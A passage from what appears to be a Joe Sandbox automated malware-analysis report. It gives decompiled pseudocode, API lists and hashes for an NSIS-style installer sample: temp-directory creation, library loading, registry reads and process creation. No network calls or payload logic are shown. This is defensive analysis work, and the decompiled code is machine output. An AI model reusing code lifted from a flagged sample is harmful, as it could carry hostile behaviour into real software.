                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: CountFileNameTempTick
                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                  • API String ID: 1716503409-678247507
                                  • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                  • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                  • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                  • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E004015C1(short __ebx, void* __eflags) {
                                  				void* _t17;
                                  				int _t23;
                                  				void* _t25;
                                  				signed char _t26;
                                  				short _t28;
                                  				short _t31;
                                  				short* _t34;
                                  				void* _t36;
                                  
                                  				_t28 = __ebx;
                                  				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                  				_t17 = E00405EB7(_t16);
                                  				_t32 = _t17;
                                  				if(_t17 != __ebx) {
                                  					do {
                                  						_t34 = E00405E39(_t32, 0x5c);
                                  						_t31 =  *_t34;
                                  						 *_t34 = _t28;
                                  						if(_t31 != _t28) {
                                  							L5:
                                  							_t25 = E00405AEB( *(_t36 + 8));
                                  						} else {
                                  							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                  							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
                                  								goto L5;
                                  							} else {
                                  								_t25 = E00405A6E( *(_t36 + 8)); // executed
                                  							}
                                  						}
                                  						if(_t25 != _t28) {
                                  							if(_t25 != 0xb7) {
                                  								L9:
                                  								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                  							} else {
                                  								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                  								if((_t26 & 0x00000010) == 0) {
                                  									goto L9;
                                  								}
                                  							}
                                  						}
                                  						 *_t34 = _t31;
                                  						_t32 = _t34 + 2;
                                  					} while (_t31 != _t28);
                                  				}
                                  				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                  					_push(0xfffffff5);
                                  					E00401423();
                                  				} else {
                                  					E00401423(0xffffffe6);
                                  					E0040653D(L"C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t36 + 8));
                                  					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                  					if(_t23 == 0) {
                                  						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                  					}
                                  				}
                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                                  				return 0;
                                  			}











                                  0x004015c1
                                  0x004015c9
                                  0x004015cc
                                  0x004015d1
                                  0x004015d5
                                  0x004015d7
                                  0x004015df
                                  0x004015e1
                                  0x004015e4
                                  0x004015ea
                                  0x00401604
                                  0x00401607
                                  0x004015ec
                                  0x004015ec
                                  0x004015ef
                                  0x00000000
                                  0x004015fa
                                  0x004015fd
                                  0x004015fd
                                  0x004015ef
                                  0x0040160e
                                  0x00401615
                                  0x00401624
                                  0x00401624
                                  0x00401617
                                  0x0040161a
                                  0x00401622
                                  0x00000000
                                  0x00000000
                                  0x00401622
                                  0x00401615
                                  0x00401627
                                  0x0040162b
                                  0x0040162c
                                  0x004015d7
                                  0x00401634
                                  0x00401663
                                  0x004022f1
                                  0x00401636
                                  0x00401638
                                  0x00401645
                                  0x0040164d
                                  0x00401655
                                  0x0040165b
                                  0x0040165b
                                  0x00401655
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                    • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                    • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                  • String ID: C:\Users\user\AppData\Local\Temp
                                  • API String ID: 1892508949-47812868
                                  • Opcode ID: ba54128ff5b5058777b79fccadcb4a48bc090ad694552908408a69dde096ba94
                                  • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                  • Opcode Fuzzy Hash: ba54128ff5b5058777b79fccadcb4a48bc090ad694552908408a69dde096ba94
                                  • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 60%
                                  			E004020D8(void* __ebx, void* __eflags) {
                                  				struct HINSTANCE__* _t23;
                                  				struct HINSTANCE__* _t31;
                                  				void* _t32;
                                  				WCHAR* _t35;
                                  				intOrPtr* _t36;
                                  				void* _t37;
                                  				void* _t39;
                                  
                                  				_t32 = __ebx;
                                  				asm("sbb eax, 0x434fc0");
                                  				 *(_t39 - 4) = 1;
                                  				if(__eflags < 0) {
                                  					_push(0xffffffe7);
                                  					L15:
                                  					E00401423();
                                  					L16:
                                  					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                  					return 0;
                                  				}
                                  				_t35 = E00402DA6(0xfffffff0);
                                  				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                  				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                  					L3:
                                  					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                  					_t47 = _t23 - _t32;
                                  					 *(_t39 + 8) = _t23;
                                  					if(_t23 == _t32) {
                                  						_push(0xfffffff6);
                                  						goto L15;
                                  					}
                                  					L4:
                                  					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                  					if(_t36 == _t32) {
                                  						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                  					} else {
                                  						 *(_t39 - 4) = _t32;
                                  						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                  							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
                                  						} else {
                                  							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                  							if( *_t36() != 0) {
                                  								 *(_t39 - 4) = 1;
                                  							}
                                  						}
                                  					}
                                  					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
                                  						FreeLibrary( *(_t39 + 8));
                                  					}
                                  					goto L16;
                                  				}
                                  				_t31 = GetModuleHandleW(_t35); // executed
                                  				 *(_t39 + 8) = _t31;
                                  				if(_t31 != __ebx) {
                                  					goto L4;
                                  				}
                                  				goto L3;
                                  			}










                                  0x004020d8
                                  0x004020d8
                                  0x004020dd
                                  0x004020e4
                                  0x004021a3
                                  0x004022f1
                                  0x004022f1
                                  0x00402c2a
                                  0x00402c2d
                                  0x00402c39
                                  0x00402c39
                                  0x004020f3
                                  0x004020fd
                                  0x00402100
                                  0x00402110
                                  0x00402114
                                  0x0040211a
                                  0x0040211c
                                  0x0040211f
                                  0x0040219c
                                  0x00000000
                                  0x0040219c
                                  0x00402121
                                  0x0040212c
                                  0x00402130
                                  0x00402170
                                  0x00402132
                                  0x00402135
                                  0x00402138
                                  0x00402164
                                  0x0040213a
                                  0x0040213d
                                  0x00402146
                                  0x00402148
                                  0x00402148
                                  0x00402146
                                  0x00402138
                                  0x00402178
                                  0x00402191
                                  0x00402191
                                  0x00000000
                                  0x00402178
                                  0x00402103
                                  0x0040210b
                                  0x0040210e
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                    • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,00403418), ref: 004055FA
                                    • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll), ref: 0040560C
                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                  • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                  • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                  • String ID:
                                  • API String ID: 334405425-0
                                  • Opcode ID: 57a0a3861126cd1cf6113bcab6e3fe6859f719f612c4d6b86b9542baaaa6fbc1
                                  • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                  • Opcode Fuzzy Hash: 57a0a3861126cd1cf6113bcab6e3fe6859f719f612c4d6b86b9542baaaa6fbc1
                                  • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
                                  				void* _t9;
                                  				int _t10;
                                  				long _t13;
                                  				int* _t16;
                                  				intOrPtr _t21;
                                  				short* _t22;
                                  				void* _t24;
                                  				void* _t26;
                                  				void* _t29;
                                  
                                  				_t22 = __edi;
                                  				_t21 = __edx;
                                  				_t16 = __ebx;
                                  				_t9 = E00402DE6(_t29, 0x20019); // executed
                                  				_t24 = _t9;
                                  				_t10 = E00402D84(3);
                                  				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
                                  				 *__edi = __ebx;
                                  				if(_t24 == __ebx) {
                                  					 *((intOrPtr*)(_t26 - 4)) = 1;
                                  				} else {
                                  					 *(_t26 + 8) = 0x3ff;
                                  					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
                                  						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx); // executed
                                  						__eflags = _t13;
                                  						if(_t13 != 0) {
                                  							 *((intOrPtr*)(_t26 - 4)) = 1;
                                  						}
                                  					} else {
                                  						RegEnumKeyW(_t24, _t10, __edi, 0x3ff); // executed
                                  					}
                                  					_t22[0x3ff] = _t16;
                                  					_push(_t24); // executed
                                  					RegCloseKey(); // executed
                                  				}
                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t26 - 4));
                                  				return 0;
                                  			}












                                  0x0040259e
                                  0x0040259e
                                  0x0040259e
                                  0x004025a3
                                  0x004025aa
                                  0x004025ac
                                  0x004025b4
                                  0x004025b7
                                  0x004025ba
                                  0x0040292e
                                  0x004025c0
                                  0x004025c8
                                  0x004025cb
                                  0x004025e4
                                  0x004025ea
                                  0x004025ec
                                  0x004025ee
                                  0x004025ee
                                  0x004025cd
                                  0x004025d1
                                  0x004025d1
                                  0x004025f5
                                  0x004025fc
                                  0x004025fd
                                  0x004025fd
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                  • RegEnumValueW.KERNELBASE ref: 004025E4
                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsw2F33.tmp,00000000,00000011,00000002), ref: 004025FD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Enum$CloseValue
                                  • String ID:
                                  • API String ID: 397863658-0
                                  • Opcode ID: eb9df6b21734892f9bbad1cbe90c9056fa24d27ccda46ff3ee83950333d8f9d7
                                  • Instruction ID: 08080f496e1fbaad801da7c4a2f11cdf7a22a5a493a276a89d416976773fa01e
                                  • Opcode Fuzzy Hash: eb9df6b21734892f9bbad1cbe90c9056fa24d27ccda46ff3ee83950333d8f9d7
                                  • Instruction Fuzzy Hash: 89017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61C0EBB85E44966D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E0040252A(int* __ebx, char* __edi) {
                                  				void* _t17;
                                  				short* _t18;
                                  				void* _t35;
                                  				void* _t37;
                                  				void* _t40;
                                  
                                  				_t33 = __edi;
                                  				_t27 = __ebx;
                                  				_t17 = E00402DE6(_t40, 0x20019); // executed
                                  				_t35 = _t17;
                                  				_t18 = E00402DA6(0x33);
                                  				 *__edi = __ebx;
                                  				if(_t35 == __ebx) {
                                  					 *(_t37 - 4) = 1;
                                  				} else {
                                  					 *(_t37 - 0x10) = 0x800;
                                  					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
                                  						L7:
                                  						 *_t33 = _t27;
                                  						 *(_t37 - 4) = 1;
                                  					} else {
                                  						if( *(_t37 + 8) == 4) {
                                  							__eflags =  *(_t37 - 0x20) - __ebx;
                                  							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
                                  							E00406484(__edi,  *__edi);
                                  						} else {
                                  							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                  								 *(_t37 - 4) =  *(_t37 - 0x20);
                                  								_t33[0x7fe] = _t27;
                                  							} else {
                                  								goto L7;
                                  							}
                                  						}
                                  					}
                                  					_push(_t35); // executed
                                  					RegCloseKey(); // executed
                                  				}
                                  				 *0x434f88 =  *0x434f88 +  *(_t37 - 4);
                                  				return 0;
                                  			}








                                  0x0040252a
                                  0x0040252a
                                  0x0040252f
                                  0x00402536
                                  0x00402538
                                  0x0040253f
                                  0x00402542
                                  0x0040292e
                                  0x00402548
                                  0x0040254b
                                  0x00402566
                                  0x00402596
                                  0x00402596
                                  0x00402599
                                  0x00402568
                                  0x0040256c
                                  0x00402585
                                  0x0040258c
                                  0x0040258f
                                  0x0040256e
                                  0x00402571
                                  0x0040257c
                                  0x004025f5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402571
                                  0x0040256c
                                  0x004025fc
                                  0x004025fd
                                  0x004025fd
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsw2F33.tmp,00000000,00000011,00000002), ref: 004025FD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: CloseQueryValue
                                  • String ID:
                                  • API String ID: 3356406503-0
                                  • Opcode ID: eec3f70398031fc336dcd3e0d600c2292d380f0397dd8c1913a76aa5ba941c81
                                  • Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
                                  • Opcode Fuzzy Hash: eec3f70398031fc336dcd3e0d600c2292d380f0397dd8c1913a76aa5ba941c81
                                  • Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 69%
                                  			E00401389(signed int _a4) {
                                  				intOrPtr* _t6;
                                  				void* _t8;
                                  				void* _t10;
                                  				signed int _t11;
                                  				void* _t12;
                                  				signed int _t16;
                                  				signed int _t17;
                                  				void* _t18;
                                  
                                  				_t17 = _a4;
                                  				while(_t17 >= 0) {
                                  					_t6 = _t17 * 0x1c +  *0x434f30;
                                  					if( *_t6 == 1) {
                                  						break;
                                  					}
                                  					_push(_t6); // executed
                                  					_t8 = E00401434(); // executed
                                  					if(_t8 == 0x7fffffff) {
                                  						return 0x7fffffff;
                                  					}
                                  					_t10 = E0040136D(_t8);
                                  					if(_t10 != 0) {
                                  						_t11 = _t10 - 1;
                                  						_t16 = _t17;
                                  						_t17 = _t11;
                                  						_t12 = _t11 - _t16;
                                  					} else {
                                  						_t12 = _t10 + 1;
                                  						_t17 = _t17 + 1;
                                  					}
                                  					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                  						 *0x433eec =  *0x433eec + _t12;
                                  						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
                                  					}
                                  				}
                                  				return 0;
                                  			}











                                  0x0040138a
                                  0x004013fa
                                  0x0040139b
                                  0x004013a0
                                  0x00000000
                                  0x00000000
                                  0x004013a2
                                  0x004013a3
                                  0x004013ad
                                  0x00000000
                                  0x00401404
                                  0x004013b0
                                  0x004013b7
                                  0x004013bd
                                  0x004013be
                                  0x004013c0
                                  0x004013c2
                                  0x004013b9
                                  0x004013b9
                                  0x004013ba
                                  0x004013ba
                                  0x004013c9
                                  0x004013cb
                                  0x004013f4
                                  0x004013f4
                                  0x004013c9
                                  0x00000000

                                  APIs
                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                  • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                  • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                  • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                  • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                  • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Window$EnableShow
                                  • String ID:
                                  • API String ID: 1136574915-0
                                  • Opcode ID: fa234a311d5315365d19d83b79d92e578c8214a2500263e11cb90b957d52e03b
                                  • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                  • Opcode Fuzzy Hash: fa234a311d5315365d19d83b79d92e578c8214a2500263e11cb90b957d52e03b
                                  • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405B20(WCHAR* _a4) {
                                  				struct _PROCESS_INFORMATION _v20;
                                  				int _t7;
                                  
                                  				0x430270->cb = 0x44;
                                  				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
                                  				if(_t7 != 0) {
                                  					CloseHandle(_v20.hThread);
                                  					return _v20.hProcess;
                                  				}
                                  				return _t7;
                                  			}





                                  0x00405b29
                                  0x00405b49
                                  0x00405b51
                                  0x00405b56
                                  0x00000000
                                  0x00405b5c
                                  0x00405b60

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: CloseCreateHandleProcess
                                  • String ID:
                                  • API String ID: 3712363035-0
                                  • Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                  • Instruction ID: 0547baa0b497a95b6ed0e8f273b1969b1ac2c9598ef2001c301bcde660c6e2d6
                                  • Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
